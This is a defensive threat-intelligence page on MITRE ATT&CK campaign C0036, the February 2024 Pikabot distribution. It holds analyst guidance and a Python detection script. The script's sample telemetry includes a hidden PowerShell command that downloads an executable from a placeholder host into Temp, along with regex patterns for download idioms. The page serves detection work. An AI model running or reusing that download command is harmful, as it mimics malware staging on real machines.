MITRE ATT&CK® Campaign

C0036: Pikabot Distribution February 2024

Pikabot was distributed in Pikabot Distribution February 2024 using malicious emails with embedded links leading to malicious ZIP archives requiring user interaction for follow-on infection. The version of Pikabot distributed featured significant changes over the 2023 variant, including reduced code complexity and simplified obfuscation mechanisms.[1][2]

Domain: Enterprise | ID: C0036 | Type: Campaign | Object version: 1.0
Glexia's Take

Analyst context for executives and security teams

Analyst confidence: Medium

This campaign matters because it shows a practical initial-access path: malicious email links leading users to download ZIP archives and interact with them, resulting in Pikabot distribution. For leaders, the decision point is not just “do we block malware,” but whether email, web, endpoint, and user-execution controls work together when the payload is link-delivered rather than attached directly to the message.

Executive priority

Prioritize this as an email-to-endpoint resilience scenario. The business risk is that a user-driven download chain can bypass attachment-focused controls and create follow-on incident response burden. Security leaders should ask whether the organization can prove coverage for malicious links, archive downloads, JavaScript and PowerShell execution, and execution-flow hijacking behavior, especially on Windows, the platform the related Pikabot software object is associated with.

Technical view

ATT&CK provides no campaign-level detection text, so validation should be built from the documented relationships: Spearphishing Link for initial access, JavaScript and PowerShell for execution, Hijack Execution Flow for the loader stage (a tampered legitimate executable, per the relationship table below), and Pikabot as the distributed software. SOC teams should test visibility across the full chain: inbound email containing links, URL click and web download activity, ZIP archive handling, user-launched execution, script interpreter activity, and endpoint behaviors consistent with execution-flow hijacking. Treat this as a coverage-mapping exercise rather than a single alert signature.

Likely telemetry

  • Email security gateway and mail platform logs for messages containing embedded links
  • URL click, browser, DNS, proxy, and secure web gateway logs for link access and ZIP downloads
  • Endpoint file creation and archive extraction events
  • Process creation telemetry for user-launched files, PowerShell, and JavaScript/JScript execution through Windows Script Host (wscript.exe, cscript.exe)
  • Windows endpoint telemetry relevant to Pikabot-related execution behavior

Detection direction

  • Validate that link-based phishing is inspected, not only file attachments.
  • Correlate email-link clicks with subsequent ZIP downloads and endpoint execution events.
  • Tune for suspicious PowerShell and JavaScript execution in the context of recent email or web-download activity to reduce false positives from legitimate administration or development use.
  • Review detections for execution-flow hijacking behaviors, but expect environment-specific baselining because legitimate software can also load components dynamically.
  • Confirm whether Pikabot detections are mapped to the related software object and whether they depend on signatures, behavior, or both.
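
The correlation described in the technical view and the detection direction above, as an added example written for this page (it is not code from the original page, from MITRE, or from the cited vendor reports): anchor on a download-capable PowerShell process, then look back for a script host launched from a user-writable path, a ZIP download, and an email link click by the same user on the same host. The pipe-delimited log format, the field names (image, parent, cmd, url) and every event in SAMPLE_LOG are constructed for illustration and do not reflect any real product schema; the 30-minute window and the severity thresholds are assumptions to tune locally.

```python
"""Link -> ZIP -> script host -> PowerShell chain correlation over sample telemetry.

Added example; not code from the page, MITRE, or the cited reports. Log format,
field names and all events are constructed for illustration.
"""
import re
from datetime import datetime, timedelta

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
PS_HOSTS = {"powershell.exe", "pwsh.exe"}
# PowerShell idioms that fetch content: routine for admins, suspicious right after a web download.
PS_DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|start-bitstransfer", re.I)
# User-writable locations where a member of a just-opened archive typically executes from.
USER_PATH_RE = re.compile(r"\\users\\[^\\]+\\(downloads|appdata\\local\\temp)\\", re.I)

# Constructed sample telemetry: "<ISO time>|<source>|<user>|<host>|key=value;key=value"
SAMPLE_LOG = r"""
2024-02-20T09:01:10|email_click|alice|WS01|url=https://example.invalid/docs/Invoice_3398.zip
2024-02-20T09:01:15|web_download|alice|WS01|url=https://example.invalid/docs/Invoice_3398.zip;bytes=21433
2024-02-20T09:02:40|proc_create|alice|WS01|image=C:\Windows\System32\wscript.exe;parent=C:\Windows\explorer.exe;cmd=wscript.exe C:\Users\alice\AppData\Local\Temp\Temp1_Invoice_3398.zip\Invoice_3398.js
2024-02-20T09:02:41|proc_create|alice|WS01|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe;parent=C:\Windows\System32\wscript.exe;cmd=powershell.exe -nop -w hidden -c "Invoke-WebRequest https://example.invalid/u/x -OutFile $env:TEMP\x.exe"
2024-02-20T10:15:00|proc_create|bob|WS02|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe;parent=C:\Windows\System32\cmd.exe;cmd=powershell.exe Invoke-WebRequest https://updates.corp.invalid/agent.msi -OutFile C:\Temp\agent.msi
"""


def parse_log(text):
    """Turn the pipe-delimited sample format into dicts, oldest first."""
    events = []
    for line in text.strip().splitlines():
        ts, source, user, host, kv = line.split("|", 4)
        fields = dict(item.split("=", 1) for item in kv.split(";"))
        events.append({"ts": datetime.fromisoformat(ts), "source": source,
                       "user": user, "host": host, **fields})
    return sorted(events, key=lambda e: e["ts"])


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def severity(stages):
    # One stage is only "PowerShell fetched something"; two deserves a look;
    # three or more ties the download back to a link-delivered archive.
    return "high" if len(stages) >= 3 else "review" if len(stages) == 2 else "baseline"


def find_chains(events, window=timedelta(minutes=30)):
    """Anchor on download-capable PowerShell, then look back for the rest of the chain."""
    findings = []
    for ev in events:
        if ev["source"] != "proc_create" or basename(ev.get("image", "")) not in PS_HOSTS:
            continue
        if not PS_DOWNLOAD_RE.search(ev.get("cmd", "")):
            continue
        stages = {"powershell_download": ev["ts"]}
        if basename(ev.get("parent", "")) in SCRIPT_HOSTS:
            stages["spawned_by_script_host"] = ev["ts"]
        # Same user and host, strictly earlier, inside the look-back window.
        for e in events:
            if (e["user"], e["host"]) != (ev["user"], ev["host"]):
                continue
            if not (ev["ts"] - window <= e["ts"] < ev["ts"]):
                continue
            if (e["source"] == "proc_create" and basename(e.get("image", "")) in SCRIPT_HOSTS
                    and USER_PATH_RE.search(e.get("cmd", ""))):
                stages["script_run_from_user_path"] = e["ts"]
            elif e["source"] == "web_download" and e.get("url", "").lower().endswith(".zip"):
                stages["zip_download"] = e["ts"]
            elif e["source"] == "email_click":
                stages["email_link_click"] = e["ts"]
        findings.append({"user": ev["user"], "host": ev["host"], "at": ev["ts"],
                         "stages": sorted(stages, key=stages.get),
                         "severity": severity(stages)})
    return findings


def detect(log_text):
    return find_chains(parse_log(log_text))


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f["severity"].upper(), f["user"], f["host"], " -> ".join(f["stages"]))
```

Run stand-alone, the sample yields one high-severity chain for alice (email click, ZIP download, wscript.exe from the Temp path, PowerShell download spawned by the script host) and a baseline-only finding for bob, whose Invoke-WebRequest from cmd.exe has no preceding email or web-download context. That second case is the point of the tuning advice above: the same PowerShell command line is flagged or suppressed by what came before it, not by the command text alone.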

Mitigation priorities

  • Strengthen phishing and URL defenses for embedded links, including inspection of links that lead to downloaded archives.
  • Apply web controls and download policies for ZIP archives from untrusted sources where business-appropriate.
  • Improve user reporting and awareness around link-delivered archives requiring interaction.
  • Harden script execution controls and logging for PowerShell and JavaScript/JScript without disrupting approved administrative workflows.
  • Use application control or allow-listing strategies where feasible to reduce execution of untrusted downloaded content.

Analyst notes and limits

The supplied ATT&CK object documents a February 2024 Pikabot distribution campaign using malicious emails with embedded links to ZIP archives requiring user interaction. Relationship context adds the relevant ATT&CK techniques and Pikabot software association. This take intentionally focuses on defensive validation and control prioritization rather than attribution or claims of current activity.

Campaign-level platforms, tactics, and official detection guidance are not specified. Platform statements should therefore be limited to related objects, such as Pikabot being associated with Windows. Local telemetry, control configuration, and business-approved scripting use are required to determine actual exposure or coverage.


Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

Domain | ID | Name | Relationship / procedure

Enterprise | T1574 | Hijack Execution Flow
Pikabot Distribution February 2024 utilized a tampered legitimate executable, `grepWinNP3.exe`, for its first-stage Pikabot loader, modifying the open-source tool to execute malicious code when launched.[1]

Enterprise | T1059.007 | JavaScript (sub-technique)
Pikabot Distribution February 2024 utilized obfuscated JavaScript files for initial Pikabot payload download.[1]

Enterprise | T1059.001 | PowerShell (sub-technique)
Pikabot Distribution February 2024 passed execution from obfuscated JavaScript files to PowerShell scripts to download and install Pikabot.[1]

Enterprise | T1566.002 | Spearphishing Link (sub-technique)
Pikabot Distribution February 2024 utilized emails with hyperlinks leading to malicious ZIP archive files containing scripts to download and install Pikabot.[1]

Associated objects

Groups, software, and campaigns

Malware (Enterprise): S1145 Pikabot
Platforms: Windows

Pikabot is a backdoor used for initial access and follow-on tool deployment, active since early 2023. Pikabot is notable for extensive use of multiple encoding, encryption, and defense evasion mechanisms to evade defenses and avoid analysis. Pikabot has some overlaps with QakBot, but insufficient evidence exists to definitively link these two malware families. Pikabot is frequently used to deploy follow-on tools such as Cobalt Strike or ransomware variants.[1][2][3]

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release: 19.1
Object version: 1.0
Created:
Modified:
Raw hash: 3277aa2aedd7714a...

Imported snapshots across ATT&CK releases (1)

Release 19.1 | Object version 1.0 | Status: Current bundle | Raw hash 3277aa2aedd7…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

[1] Elastic Pikabot 2024. Daniel Stepanic & Salim Bitam. (2024, February 23). PIKABOT, I choose you!. Retrieved July 12, 2024.
[2] Zscaler Pikabot 2024. Nikolaos Pantazopoulos. (2024, February 12). The (D)Evolution of Pikabot. Retrieved July 17, 2024.
[3] mitre-attack C0036. MITRE ATT&CK campaign entry for C0036.

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.